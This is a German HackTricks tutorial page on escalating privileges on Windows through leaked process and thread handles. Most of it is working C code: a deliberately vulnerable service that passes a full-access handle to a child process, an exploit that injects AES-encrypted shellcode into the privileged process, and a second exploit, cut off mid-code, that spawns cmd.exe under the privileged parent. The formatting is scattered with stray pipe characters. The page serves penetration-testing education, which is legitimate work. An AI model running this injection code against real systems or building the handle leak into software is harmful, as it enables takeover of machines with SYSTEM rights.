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# Ausnutzung von ausgelaufenen Handles
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<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
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Andere Möglichkeiten, HackTricks zu unterstützen:
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* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
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</details>
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## Einführung
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Handles in einem Prozess ermöglichen den Zugriff auf verschiedene Windows-Ressourcen:
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![RootedCON2022 - Ausnutzung ausgelaufener Handles für LPE](<../../.gitbook/assets/image (663) (1).png>)
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Es gab bereits mehrere Fälle von **Privilege Escalation**, bei denen ein **privilegierter Prozess mit offenen und vererbten Handles** einen **unprivilegierten Prozess ausgeführt hat**, wodurch diesem Zugriff auf all diese Handles gewährt wurde.
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Stellen Sie sich zum Beispiel vor, dass ein als SYSTEM ausgeführter Prozess einen neuen Prozess (`OpenProcess()`) mit **vollen Zugriffsrechten** öffnet. Derselbe Prozess erstellt auch einen neuen Prozess (`CreateProcess()`) mit niedrigen Berechtigungen, erbt jedoch alle offenen Handles des Hauptprozesses.\
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Dann können Sie, wenn Sie **vollen Zugriff auf den Prozess mit niedrigen Berechtigungen** haben, das **offene Handle zum erstellten privilegierten Prozess** mit `OpenProcess()` abrufen und einen Shellcode einschleusen.
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## **Interessante Handles**
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### **Prozess**
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Wie im ersten Beispiel erwähnt, kann ein **unprivilegierter Prozess ein Prozesshandle** eines **privilegierten Prozesses** erben, der über ausreichende Berechtigungen verfügt, um **beliebigen Code darauf auszuführen**.
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In [**diesem ausgezeichneten Artikel**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/) können Sie sehen, wie Sie jedes Prozesshandle ausnutzen können, das eine der folgenden Berechtigungen hat:
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* PROCESS\_ALL\_ACCESS
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* PROCESS\_CREATE\_PROCESS
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* PROCESS\_CREATE\_THREAD
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* PROCESS\_DUP\_HANDLE
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* PROCESS\_VM\_WRITE
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### Thread
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Ähnlich wie bei den Prozesshandles kann ein **unprivilegierter Prozess ein Threadhandle** eines **privilegierten Prozesses** erben, der über ausreichende Berechtigungen verfügt, um **beliebigen Code darauf auszuführen**.
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In [**diesem ausgezeichneten Artikel**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/) können Sie auch sehen, wie Sie jedes Threadhandle ausnutzen können, das eine der folgenden Berechtigungen hat:
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* THREAD\_ALL\_ACCESS
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* THREAD\_DIRECT\_IMPERSONATION
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* THREAD\_SET\_CONTEXT
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### Datei-, Schlüssel- und Abschnitts-Handles
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Wenn ein **unprivilegierter Prozess** ein **Handle** mit **Schreibberechtigungen** über eine **privilegierte Datei oder Registrierung** erbt, kann er die Datei/Registrierung **überschreiben** (und mit viel **Glück** **privilegierte Berechtigungen eskalieren**).
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**Abschnitts-Handles** sind ähnlich wie Datei-Handles, der gemeinsame Name für diese Art von [Objekten ist **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). Sie werden verwendet, um mit **großen Dateien zu arbeiten, ohne die gesamte** Datei im Speicher zu halten. Dadurch ähnelt die Ausnutzung der Ausnutzung eines Datei-Handles.
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## Wie man Handles von Prozessen sieht
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### Process Hacker
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[**Process Hacker**](https://github.com/processhacker/processhacker) ist ein kostenloses Tool, das Sie herunterladen können. Es bietet mehrere erstaunliche Optionen zur Inspektion von Prozessen, und eine davon ist die **Möglichkeit, die Handles jedes Prozesses zu sehen**.
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Beachten Sie, dass zum **Anzeigen aller Handles aller Prozesse die SeDebugPrivilege-Berechtigung erforderlich ist** (daher müssen Sie Process Hacker als Administrator ausführen).
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Um die Handles eines Prozesses zu sehen, klicken Sie mit der rechten Maustaste auf den Prozess und wählen Sie "Handles":
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![](<../../.gitbook/assets/image (651) (1).png>)
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Sie können dann mit der rechten Maustaste auf das Handle klicken und die **Berechtigungen überprüfen**:
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![](<../../.gitbook/assets/image (628).png>)
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### Sysinternals Handles
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Das [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)Binary von Sysinternals listet ebenfalls die Handles pro Prozess in der Konsole auf:
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![](<../../.gitbook/assets/image (654).png>)
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### LeakedHandlesFinder
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[**Dieses Tool**](https://github.com/lab52io/LeakedHandlesFinder) ermöglicht es Ihnen, ausgelaufene Handles zu **überwachen** und sie sogar automatisch auszunutzen, um Berechtigungen zu eskalieren.
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### Methodik
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Jetzt, da Sie wissen, wie Sie Handles von Prozessen finden können, müssen Sie überprüfen, ob ein **unprivilegierter Prozess Zugriff auf privilegierte Handles hat**. In diesem Fall könnte der Benutzer des Prozesses in der Lage sein, das Handle zu erhalten und es missbrauchen, um Berechtigungen zu eskalieren.
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{% hint style="warning" %}
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Es wurde zuvor erwähnt, dass Sie die SeDebugPrivilege benötigen, um auf alle Handles zugreifen zu können. Aber ein **Benutzer kann immer noch auf die Handles seiner Prozesse zugreifen**, daher kann es nützlich sein, wenn Sie von diesem Benutzer aus die Tools mit den regulären Benutzerberechtigungen ausführen möchten**.
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```bash
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handle64.exe /a | findstr /r /i "process thread file key pid:"
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```
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{% endhint %}
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## Verwundbares Beispiel
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Zum Beispiel gehört der folgende Code zu einem **Windows-Dienst**, der verwundbar wäre. Der verwundbare Code dieser Dienst-Binärdatei befindet sich innerhalb der **`Exploit`**-Funktion. Diese Funktion beginnt damit, **einen neuen Handle-Prozess mit vollständigem Zugriff zu erstellen**. Anschließend wird ein Prozess mit niedrigen Berechtigungen erstellt (indem das Token mit niedrigen Berechtigungen von _explorer.exe_ kopiert wird) und _C:\users\username\desktop\client.exe_ ausgeführt. Die **Verwundbarkeit besteht darin, dass der Prozess mit niedrigen Berechtigungen mit `bInheritHandles` als `TRUE` erstellt wird**.
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Daher ist dieser Prozess mit niedrigen Berechtigungen in der Lage, den Handle des zuerst erstellten Prozesses mit hohen Berechtigungen zu erfassen und einen Shellcode einzufügen und auszuführen (siehe nächster Abschnitt).
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```c
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#include <windows.h>
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#include <tlhelp32.h>
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#include <tchar.h>
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#pragma comment (lib, "advapi32")
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TCHAR* serviceName = TEXT("HandleLeakSrv");
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SERVICE_STATUS serviceStatus;
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SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
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HANDLE stopServiceEvent = 0;
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//Find PID of a proces from its name
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int FindTarget(const char *procname) {
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HANDLE hProcSnap;
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PROCESSENTRY32 pe32;
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int pid = 0;
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hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
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|
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
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pe32.dwSize = sizeof(PROCESSENTRY32);
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if (!Process32First(hProcSnap, &pe32)) {
|
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CloseHandle(hProcSnap);
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|
return 0;
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}
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while (Process32Next(hProcSnap, &pe32)) {
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|
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
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pid = pe32.th32ProcessID;
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break;
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}
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|
}
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|
CloseHandle(hProcSnap);
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return pid;
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}
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int Exploit(void) {
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STARTUPINFOA si;
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PROCESS_INFORMATION pi;
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int pid = 0;
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HANDLE hUserToken;
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HANDLE hUserProc;
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HANDLE hProc;
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// open a handle to itself (privileged process) - this gets leaked!
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hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
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// get PID of user low privileged process
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if ( pid = FindTarget("explorer.exe") )
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|
hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
|
|
else
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return -1;
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|
// extract low privilege token from a user's process
|
|
if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, &hUserToken)) {
|
|
CloseHandle(hUserProc);
|
|
return -1;
|
|
}
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|
// spawn a child process with low privs and leaked handle
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|
ZeroMemory(&si, sizeof(si));
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si.cb = sizeof(si);
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ZeroMemory(&pi, sizeof(pi));
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|
CreateProcessAsUserA(hUserToken, "C:\\users\\username\\Desktop\\client.exe",
|
|
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
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|
CloseHandle(hProc);
|
|
CloseHandle(hUserProc);
|
|
return 0;
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}
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void WINAPI ServiceControlHandler( DWORD controlCode ) {
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|
switch ( controlCode ) {
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|
case SERVICE_CONTROL_SHUTDOWN:
|
|
case SERVICE_CONTROL_STOP:
|
|
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
|
|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
|
|
|
SetEvent( stopServiceEvent );
|
|
return;
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|
case SERVICE_CONTROL_PAUSE:
|
|
break;
|
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|
case SERVICE_CONTROL_CONTINUE:
|
|
break;
|
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|
case SERVICE_CONTROL_INTERROGATE:
|
|
break;
|
|
|
|
default:
|
|
break;
|
|
}
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|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
|
}
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void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
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|
// initialise service status
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|
serviceStatus.dwServiceType = SERVICE_WIN32;
|
|
serviceStatus.dwCurrentState = SERVICE_STOPPED;
|
|
serviceStatus.dwControlsAccepted = 0;
|
|
serviceStatus.dwWin32ExitCode = NO_ERROR;
|
|
serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
|
|
serviceStatus.dwCheckPoint = 0;
|
|
serviceStatus.dwWaitHint = 0;
|
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|
serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
|
|
|
|
if ( serviceStatusHandle ) {
|
|
// service is starting
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|
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
|
|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
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// do initialisation here
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|
stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
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|
|
// running
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|
serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
|
|
serviceStatus.dwCurrentState = SERVICE_RUNNING;
|
|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
|
|
|
Exploit();
|
|
WaitForSingleObject( stopServiceEvent, -1 );
|
|
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|
// service was stopped
|
|
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
|
|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
|
|
|
// do cleanup here
|
|
CloseHandle( stopServiceEvent );
|
|
stopServiceEvent = 0;
|
|
|
|
// service is now stopped
|
|
serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
|
|
serviceStatus.dwCurrentState = SERVICE_STOPPED;
|
|
SetServiceStatus( serviceStatusHandle, &serviceStatus );
|
|
}
|
|
}
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|
void InstallService() {
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|
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
|
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|
|
if ( serviceControlManager ) {
|
|
TCHAR path[ _MAX_PATH + 1 ];
|
|
if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
|
|
SC_HANDLE service = CreateService( serviceControlManager,
|
|
serviceName, serviceName,
|
|
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
|
|
SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
|
|
0, 0, 0, 0, 0 );
|
|
if ( service )
|
|
CloseServiceHandle( service );
|
|
}
|
|
CloseServiceHandle( serviceControlManager );
|
|
}
|
|
}
|
|
|
|
void UninstallService() {
|
|
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
|
|
|
|
if ( serviceControlManager ) {
|
|
SC_HANDLE service = OpenService( serviceControlManager,
|
|
serviceName, SERVICE_QUERY_STATUS | DELETE );
|
|
if ( service ) {
|
|
SERVICE_STATUS serviceStatus;
|
|
if ( QueryServiceStatus( service, &serviceStatus ) ) {
|
|
if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
|
|
DeleteService( service );
|
|
}
|
|
CloseServiceHandle( service );
|
|
}
|
|
CloseServiceHandle( serviceControlManager );
|
|
}
|
|
}
|
|
|
|
int _tmain( int argc, TCHAR* argv[] )
|
|
{
|
|
if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
|
|
InstallService();
|
|
}
|
|
else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
|
|
UninstallService();
|
|
}
|
|
else {
|
|
SERVICE_TABLE_ENTRY serviceTable[] = {
|
|
{ serviceName, ServiceMain },
|
|
{ 0, 0 }
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};
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|
|
StartServiceCtrlDispatcher( serviceTable );
|
|
}
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|
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|
return 0;
|
|
}
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|
```
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### Exploit Beispiel 1
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{% hint style="info" %}
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|
In einem realen Szenario haben Sie wahrscheinlich **keine Kontrolle über die ausführbare Datei**, die vom verwundbaren Code (_C:\users\username\desktop\client.exe_ in diesem Fall) ausgeführt wird. Wahrscheinlich werden Sie **einen Prozess kompromittieren und prüfen müssen, ob Sie auf einen verwundbaren Handle eines privilegierten Prozesses zugreifen können**.
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{% endhint %}
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|
In diesem Beispiel finden Sie den Code für einen möglichen Exploit für _C:\users\username\desktop\client.exe_.\
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|
Der interessanteste Teil dieses Codes befindet sich in `GetVulnProcHandle`. Diese Funktion wird **alle Handles abrufen**, dann wird überprüft, ob eines davon zur gleichen PID gehört und ob das Handle zu einem **Prozess gehört**. Wenn all diese Anforderungen erfüllt sind (ein zugängliches offenes Prozess-Handle wird gefunden), wird versucht, einen Shellcode unter Ausnutzung des Handles des Prozesses einzufügen und auszuführen.\
|
|
Die Injektion des Shellcodes erfolgt innerhalb der Funktion **`Inject`** und schreibt den Shellcode einfach in den privilegierten Prozess und erstellt einen Thread im selben Prozess, um den Shellcode auszuführen).
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```c
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|
#include <windows.h>
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|
#include <stdio.h>
|
|
#include <stdlib.h>
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|
#include <string.h>
|
|
#include <time.h>
|
|
#include <wincrypt.h>
|
|
#include <psapi.h>
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|
#include <tchar.h>
|
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#include <tlhelp32.h>
|
|
#include "client.h"
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|
#pragma comment (lib, "crypt32.lib")
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#pragma comment (lib, "advapi32")
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#pragma comment (lib, "kernel32")
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|
int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
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HCRYPTPROV hProv;
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HCRYPTHASH hHash;
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|
HCRYPTKEY hKey;
|
|
|
|
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
|
|
return -1;
|
|
}
|
|
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
|
|
return -1;
|
|
}
|
|
if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
|
|
return -1;
|
|
}
|
|
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
|
|
return -1;
|
|
}
|
|
|
|
if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, &payload_len)){
|
|
return -1;
|
|
}
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|
|
|
CryptReleaseContext(hProv, 0);
|
|
CryptDestroyHash(hHash);
|
|
CryptDestroyKey(hKey);
|
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|
return 0;
|
|
}
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|
|
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|
|
HANDLE GetVulnProcHandle(void) {
|
|
|
|
ULONG handleInfoSize = 0x10000;
|
|
NTSTATUS status;
|
|
PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
|
|
HANDLE hProc = NULL;
|
|
POBJECT_TYPE_INFORMATION objectTypeInfo;
|
|
PVOID objectNameInfo;
|
|
UNICODE_STRING objectName;
|
|
ULONG returnLength;
|
|
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
|
|
DWORD dwOwnPID = GetCurrentProcessId();
|
|
|
|
pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
|
|
pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
|
|
pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
|
|
pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
|
|
pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
|
|
|
|
printf("[+] Grabbing handles...");
|
|
|
|
while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
|
|
NULL )) == STATUS_INFO_LENGTH_MISMATCH)
|
|
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
|
|
|
|
if (status != STATUS_SUCCESS)
|
|
{
|
|
printf("[!] NtQuerySystemInformation failed!\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
|
|
|
|
// iterate handles until we find the privileged process handle
|
|
for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
|
|
{
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
|
|
|
|
// Check if this handle belongs to our own process
|
|
if (handle.UniqueProcessId != dwOwnPID)
|
|
continue;
|
|
|
|
objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectTypeInformation,
|
|
objectTypeInfo,
|
|
0x1000,
|
|
NULL ) != STATUS_SUCCESS)
|
|
continue;
|
|
|
|
// skip some objects to avoid getting stuck
|
|
// see: https://github.com/adamdriscoll/PoshInternals/issues/7
|
|
if (handle.GrantedAccess == 0x0012019f
|
|
&& handle.GrantedAccess != 0x00120189
|
|
&& handle.GrantedAccess != 0x120089
|
|
&& handle.GrantedAccess != 0x1A019F ) {
|
|
free(objectTypeInfo);
|
|
continue;
|
|
}
|
|
|
|
// get object name information
|
|
objectNameInfo = malloc(0x1000);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectNameInformation,
|
|
objectNameInfo,
|
|
0x1000,
|
|
&returnLength ) != STATUS_SUCCESS) {
|
|
|
|
// adjust the size of a returned object and query again
|
|
objectNameInfo = realloc(objectNameInfo, returnLength);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectNameInformation,
|
|
objectNameInfo,
|
|
returnLength,
|
|
NULL ) != STATUS_SUCCESS) {
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
continue;
|
|
}
|
|
}
|
|
|
|
// check if we've got a process object
|
|
objectName = *(PUNICODE_STRING) objectNameInfo;
|
|
UNICODE_STRING pProcess;
|
|
|
|
pRtlInitUnicodeString(&pProcess, L"Process");
|
|
if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
|
|
printf("[+] Found process handle (%x)\n", handle.HandleValue);
|
|
hProc = (HANDLE) handle.HandleValue;
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
break;
|
|
}
|
|
else
|
|
continue;
|
|
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
}
|
|
|
|
return hProc;
|
|
}
|
|
|
|
int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
|
|
|
|
LPVOID pRemoteCode = NULL;
|
|
HANDLE hThread = NULL;
|
|
BOOL bStatus = FALSE;
|
|
|
|
pVirtualAllocEx = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
|
|
pWriteProcessMemory = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
|
|
pRtlCreateUserThread = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread");
|
|
|
|
pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
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|
pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
|
|
|
|
bStatus = (BOOL) pRtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, pRemoteCode, NULL, &hThread, NULL);
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|
if (bStatus != FALSE) {
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WaitForSingleObject(hThread, -1);
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CloseHandle(hThread);
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return 0;
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}
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else
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return -1;
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}
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int main(int argc, char **argv) {
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int pid = 0;
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HANDLE hProc = NULL;
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// AES encrypted shellcode spawning notepad.exe (ExitThread)
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char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
|
|
```c
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|
unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
|
|
unsigned int payload_len = sizeof(payload);
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printf("Meine PID: %d\n", GetCurrentProcessId());
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|
getchar();
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// Finde einen geleakten Handle zu einem Prozess
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hProc = GetVulnProcHandle();
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if (hProc != NULL) {
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// Entschlüssle das Payload
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AESDecrypt((char *)payload, payload_len, key, sizeof(key));
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|
printf("[+] Sende Geschenk...");
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// Injiziere und führe das Payload im privilegierten Kontext aus
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|
Inject(hProc, payload, payload_len);
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|
printf("fertig.\n");
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|
}
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|
getchar();
|
|
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return 0;
|
|
}
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```
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### Exploit Beispiel 2
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{% hint style="info" %}
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In einem realen Szenario haben Sie wahrscheinlich **keine Kontrolle über die ausführbare Datei**, die vom verwundbaren Code (_C:\users\username\desktop\client.exe_ in diesem Fall) ausgeführt wird. Wahrscheinlich werden Sie **einen Prozess kompromittieren und prüfen müssen, ob Sie auf einen verwundbaren Handle eines privilegierten Prozesses zugreifen können**.
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{% endhint %}
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In diesem Beispiel wird **anstatt des Missbrauchs des offenen Handles zum Einschleusen** und Ausführen eines Shellcodes das Token des privilegierten offenen Handle-Prozesses verwendet, um ein neues Handle zu erstellen. Dies wird in den Zeilen 138 bis 148 durchgeführt.
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Beachten Sie, wie die Funktion `UpdateProcThreadAttribute` mit dem Attribut `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` und dem Handle zum offenen privilegierten Prozess verwendet wird. Dies bedeutet, dass der **erstellte Prozess-Thread, der \_cmd.exe ausführt**, das gleiche Token-Privileg wie der offene Handle-Prozess haben wird.
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```c
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#include <windows.h>
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#include <stdio.h>
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#include <stdlib.h>
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#include <string.h>
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#include <time.h>
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#include <wincrypt.h>
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#include <psapi.h>
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#include <tchar.h>
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#include <tlhelp32.h>
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#include "client.h"
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#pragma comment (lib, "crypt32.lib")
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#pragma comment (lib, "advapi32")
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#pragma comment (lib, "kernel32")
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HANDLE GetVulnProcHandle(void) {
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ULONG handleInfoSize = 0x10000;
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NTSTATUS status;
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PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
|
|
HANDLE hProc = NULL;
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POBJECT_TYPE_INFORMATION objectTypeInfo;
|
|
PVOID objectNameInfo;
|
|
UNICODE_STRING objectName;
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|
ULONG returnLength;
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|
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
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DWORD dwOwnPID = GetCurrentProcessId();
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|
pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
|
|
pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
|
|
pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
|
|
pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
|
|
pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
|
|
|
|
printf("[+] Grabbing handles...");
|
|
|
|
while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
|
|
NULL )) == STATUS_INFO_LENGTH_MISMATCH)
|
|
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
|
|
|
|
if (status != STATUS_SUCCESS)
|
|
{
|
|
printf("[!] NtQuerySystemInformation failed!\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
|
|
|
|
// iterate handles until we find the privileged process handle
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|
for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
|
|
{
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
|
|
|
|
// Check if this handle belongs to our own process
|
|
if (handle.UniqueProcessId != dwOwnPID)
|
|
continue;
|
|
|
|
objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectTypeInformation,
|
|
objectTypeInfo,
|
|
0x1000,
|
|
NULL ) != STATUS_SUCCESS)
|
|
continue;
|
|
|
|
// skip some objects to avoid getting stuck
|
|
// see: https://github.com/adamdriscoll/PoshInternals/issues/7
|
|
if (handle.GrantedAccess == 0x0012019f
|
|
&& handle.GrantedAccess != 0x00120189
|
|
&& handle.GrantedAccess != 0x120089
|
|
&& handle.GrantedAccess != 0x1A019F ) {
|
|
free(objectTypeInfo);
|
|
continue;
|
|
}
|
|
|
|
// get object name information
|
|
objectNameInfo = malloc(0x1000);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectNameInformation,
|
|
objectNameInfo,
|
|
0x1000,
|
|
&returnLength ) != STATUS_SUCCESS) {
|
|
|
|
// adjust the size of a returned object and query again
|
|
objectNameInfo = realloc(objectNameInfo, returnLength);
|
|
if (pNtQueryObject( (HANDLE) handle.HandleValue,
|
|
ObjectNameInformation,
|
|
objectNameInfo,
|
|
returnLength,
|
|
NULL ) != STATUS_SUCCESS) {
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
continue;
|
|
}
|
|
}
|
|
|
|
// check if we've got a process object
|
|
objectName = *(PUNICODE_STRING) objectNameInfo;
|
|
UNICODE_STRING pProcess;
|
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|
|
pRtlInitUnicodeString(&pProcess, L"Process");
|
|
if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
|
|
printf("[+] Found process handle (%x)\n", handle.HandleValue);
|
|
hProc = (HANDLE) handle.HandleValue;
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
break;
|
|
}
|
|
else
|
|
continue;
|
|
|
|
free(objectTypeInfo);
|
|
free(objectNameInfo);
|
|
}
|
|
|
|
return hProc;
|
|
}
|
|
|
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|
int main(int argc, char **argv) {
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|
HANDLE hProc = NULL;
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STARTUPINFOEXA si;
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PROCESS_INFORMATION pi;
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int pid = 0;
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SIZE_T size;
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|
BOOL ret;
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Sleep(20000);
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|
// find leaked process handle
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|
hProc = GetVulnProcHandle();
|
|
|
|
if ( hProc != NULL) {
|
|
|
|
// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
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|
ZeroMemory(&si, sizeof(STARTUPINFOEXA));
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|
|
|
